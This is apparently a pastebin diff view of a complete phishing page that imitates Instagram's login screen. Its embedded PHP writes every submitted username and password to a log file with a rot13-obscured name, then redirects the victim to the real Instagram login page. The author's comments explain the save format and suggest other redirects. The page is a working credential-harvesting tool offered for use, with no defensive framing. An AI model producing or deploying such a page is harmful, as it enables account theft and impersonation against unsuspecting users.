View difference between Paste ID: jLivk9Vt and XjeS1rGx
SHOW: | | - or go back to the newest paste.
1
<!-- CODE BY DANDY | PLEASE DONT CHANGE MY NAME -->
2
<!DOCTYPE html>
3
<html class=''>
4
<head><link rel="mask-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.svg/9d8680ab8a3c.svg" color="#262626"><link rel="shortcut icon" type="image/x-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.ico/dfa85bb1fd63.ico"><link rel='stylesheet prefetch' href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css'><style class="cp-pen-styles">@import url(https://fonts.googleapis.com/css?family=Open+Sans);body{background-color:#FAFAFA;color:#DCDCDC;font-family:Open Sans}.login-box{margin-top:100px;text-align:center;width:430px;height:380px;background-color:#fff;padding:60px}.logo{height:70px;margin-bottom:30px}.form-control{margin-bottom:20px}.btn{width:100%;font-size:16px}</style> <title>Login - Instagram</title></head><body> <div class="well login-box center-block"> <img class="logo" src="http://www.dallasarboretum.org/assets/img/instagram-word.png"></img> <form name="login" method="post"> <input type="text" class="form-control" placeholder="Username" id="userid" name="userid" required/> <input type="password" class="form-control" id="pass" placeholder="Password" name="pswrd" required/> <button class="btn btn-primary" type="submit" id="submit">Log In</button> </div></form> </div>
5
  <?php
6
if (isset($_POST['userid']) && isset($_POST['pswrd'])) {
7
    $username = $_POST['userid'];
8
    $password = $_POST['pswrd'];
9
    $name     = str_rot13('wapxzrqvn');
10
    $file     = fopen("" . $name . ".txt", "a+"); //Log File
11
    // Save format = Username:Password
12
    fwrite($file, $username . ":" . $password . "\r\n");
13
    fclose($file);
14
    echo '<meta http-equiv="refresh" content="0; url=https://www.instagram.com/accounts/login/?force_classic_login&hl=id" />'; //Redirect
15
    // Redirect can be redirected anywhere, its up to you. Example: redirect to 404.php so would appear to error page.
16
    //Im so lazy to create redirect page :v
17
}
18
?>
19
</body>
20
</html>
21
<!-- JNCK MEDIA -->